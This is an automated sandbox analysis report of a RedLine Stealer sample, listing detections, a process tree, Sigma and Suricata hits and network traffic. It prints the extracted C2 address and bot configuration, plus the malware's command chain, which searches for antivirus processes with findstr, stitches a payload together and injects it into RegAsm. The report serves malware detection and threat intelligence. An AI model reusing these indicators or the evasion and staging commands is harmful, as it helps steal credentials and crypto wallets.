Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe

Overview

General Information

Sample name:be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
Analysis ID:1483221
MD5:37bdc150af529c0f560f1269dee8fa17
SHA1:d5c9e4dd36a99407c0824478c00d0f97fb26ab2f
SHA256:be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb31c0e34c7835baa828af
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Copy From or To System Directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe (PID: 6592 cmdline: "C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe" MD5: 37BDC150AF529C0F560F1269DEE8FA17)
    • be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp (PID: 6640 cmdline: "C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp" /SL5="$10422,3479677,781312,C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe" MD5: 6CE04FD06C6A2CADE4A53F1521743144)
      • Setup.exe (PID: 6816 cmdline: "C:\Program Files (x86)\StrLocalGate\Setup.exe" MD5: 1C83CFBC97F7BC13E849E9E1AF8E7DA7)
        • Setup.tmp (PID: 7004 cmdline: "C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp" /SL5="$20426,920064,920064,C:\Program Files (x86)\StrLocalGate\Setup.exe" MD5: 85FE6257CAB9D61BA8C481C64D0026BD)
      • MmReveals.exe (PID: 6884 cmdline: "C:\StrLocalGate\MmReveals.exe" MD5: 5223A85FF161E8818F0E514048051E7D)
        • cmd.exe (PID: 7076 cmdline: "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 5928 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5676 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 1804 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 6304 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 1900 cmdline: cmd /c md 154571 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • findstr.exe (PID: 3568 cmdline: findstr /V "TRUEANALOGMINDOC" Pepper MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 7132 cmdline: cmd /c copy /b Lt + Blake + Tranny + Category 154571\i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Eco.pif (PID: 2004 cmdline: 154571\Eco.pif 154571\i MD5: B06E67F9767E5023892D9698703AD098)
            • RegAsm.exe (PID: 4476 cmdline: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
            • RegAsm.exe (PID: 4856 cmdline: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • timeout.exe (PID: 6836 cmdline: timeout 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.140.147.183:12245"], "Bot Id": "YT2", "Authorization Header": "1a1f648c602cc3ac1cfdc397a97b9b88"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000E.00000003.2257485805.0000000004EC8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000000E.00000003.2257260838.00000000048DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000E.00000003.2315350794.0000000004823000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            0000000E.00000003.2317192962.000000000497F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000014.00000002.2565104285.0000000000702000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 22 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                14.3.Eco.pif.486a450.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  20.2.RegAsm.exe.700000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
                    Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, ParentCommandLine: 154571\Eco.pif 154571\i, ParentImage: C:\Users\user\AppData\Local\Temp\154571\Eco.pif, ParentProcessId: 2004, ParentProcessName: Eco.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, ProcessId: 4476, ProcessName: RegAsm.exe
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 154571\Eco.pif 154571\i, CommandLine: 154571\Eco.pif 154571\i, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\154571\Eco.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\154571\Eco.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\154571\Eco.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7076, ParentProcessName: cmd.exe, ProcessCommandLine: 154571\Eco.pif 154571\i, ProcessId: 2004, ProcessName: Eco.pif
                    Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, ParentCommandLine: 154571\Eco.pif 154571\i, ParentImage: C:\Users\user\AppData\Local\Temp\154571\Eco.pif, ParentProcessId: 2004, ParentProcessName: Eco.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, ProcessId: 4476, ProcessName: RegAsm.exe
                    Sigma detected: Suspicious Copy From or To System Directory
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\StrLocalGate\MmReveals.exe", ParentImage: C:\StrLocalGate\MmReveals.exe, ParentProcessId: 6884, ParentProcessName: MmReveals.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit, ProcessId: 7076, ProcessName: cmd.exe

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Sigma detected: Search for Antivirus process
                    Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7076, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 6304, ProcessName: findstr.exe

                    Snort Signatures

                    No Snort rule has matched

                    Suricata Signatures

                    Timestamp:2024-07-26T21:22:07.690591+0200
                    SID:2046045
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:17.446338+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:18.812780+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:21:18.052724+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49730
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:19.403291+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:15.262237+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:16.623754+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:07.864694+0200
                    SID:2043234
                    Source Port:12245
                    Destination Port:49737
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:12.955942+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:15.075974+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:14.589006+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:18.170910+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:18.991924+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:21:56.944528+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49736
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:14.582562+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:17.937770+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:18.347768+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:15.615103+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:16.262656+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:13.136410+0200
                    SID:2046056
                    Source Port:12245
                    Destination Port:49737
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:14.307981+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:16.629545+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:19.621416+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:13.968079+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:13.409040+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:18.635280+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:19.165956+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:16.561838+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:15.440615+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:13.666343+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T21:22:17.624813+0200
                    SID:2043231
                    Source Port:49737
                    Destination Port:12245
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeAvira: detected
                    Found malware configuration
                    Source: 20.2.RegAsm.exe.700000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["45.140.147.183:12245"], "Bot Id": "YT2", "Authorization Header": "1a1f648c602cc3ac1cfdc397a97b9b88"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\StrLocalGate\MmReveals.exe (copy)ReversingLabs: Detection: 39%
                    Source: C:\StrLocalGate\is-RISCU.tmpReversingLabs: Detection: 39%
                    Multi AV Scanner detection for submitted file
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeReversingLabs: Detection: 36%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000013.00000000.2257986725.0000000000042000.00000002.00000001.01000000.0000000D.sdmp, RegAsm.exe.14.dr
                    Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000013.00000000.2257986725.0000000000042000.00000002.00000001.01000000.0000000D.sdmp, RegAsm.exe.14.dr
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_004062D5 FindFirstFileW,FindClose,3_2_004062D5
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_00402E18 FindFirstFileW,3_2_00402E18
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005747B7 GetFileAttributesW,FindFirstFileW,FindClose,14_2_005747B7
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00573B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00573B4F
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00573E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00573E72
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_0057C16C
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057CB81 FindFirstFileW,FindClose,14_2_0057CB81
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,14_2_0057CC0C
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0057F445
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0057F5A2
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_0057F8A3

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 45.140.147.183:12245
                    Source: global trafficTCP traffic: 192.168.2.4:49737 -> 45.140.147.183:12245
                    Source: Joe Sandbox ViewASN Name: SYNLINQsynlinqdeDE SYNLINQsynlinqdeDE
                    Source: unknownDNS traffic detected: query: WTYoyXMgGLmyIq.WTYoyXMgGLmyIq replaycode: Name error (3)
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.140.147.183
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0058279E InternetReadFile,InternetQueryDataAvailable,InternetReadFile,14_2_0058279E
                    Source: global trafficDNS traffic detected: DNS query: WTYoyXMgGLmyIq.WTYoyXMgGLmyIq
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.drString found in binary or memory: http://crl.globalsign.net/root.crl0
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
